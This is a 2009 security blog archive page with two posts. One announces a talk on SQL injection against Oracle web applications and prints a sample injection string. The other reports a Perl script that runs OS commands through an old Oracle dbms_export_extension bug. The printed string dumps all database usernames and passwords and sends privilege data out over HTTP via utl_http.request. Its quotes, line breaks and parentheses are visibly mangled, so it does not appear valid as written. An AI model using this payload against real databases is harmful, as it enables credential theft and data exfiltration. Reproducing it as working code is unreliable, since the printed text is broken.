Archive for Mai, 2009

Presentation from Confidence 2009 available

Samstag, Mai 16th, 2009

I just uploaded the presentation „SQL Injection in Oracle Webapps“ to our website. This presentation describes the basics of SQL, different exploitation techniques (inband, out-of-band, blind), how to search creditcard numbers in the database (using dbms_xmlgen), …Here is one of the sample SQL Injection strings from the presentation. With this  SQL Injection string we are getting all username/passwords, all table names, all column names and all privileges in one step. The trick is to use sum(length(utl_http())) in the SELECT clause.‚ or 1=((select


username||’=’||password) from dba_users)))+((select


owner||’=’||table_name) from dba_tables))+((select


owner||’=’||table_name||’=’||column_name)) from dba_users))

+((select sum(length(utl_http.request(‚http://’||grantee||’=’||granted_role) from




grantable) from dba_tab_privs)))–

Perl – Script to run OS commands via Oracle based Web Apps released

Freitag, Mai 1st, 2009

Sumit Siddarth from has released a small perl script to run OS commands via Oracle based Web Apps. Sumit is using the bug in dbms_export_extension. This problem was fixed with CPU July 2006 but all databases without this (or higher CPU or patchset) are affected (Oracle, –, –,, XE) . More details are available in my updated tutorial.

I tested the script together with him against several of my test database.

Run OS Commands via webapps via perl script

The script is easy to use. Under MacOS I had to install p5-libwww-perl to run it.

At the moment the script does not work against Oracle databases without java but I am sure sooner or later this will be changed. In my opinion the most generic way to run OS commands (as user Oracle) is PL/SQL native (Oracle 9i, Oracle 10g/11g).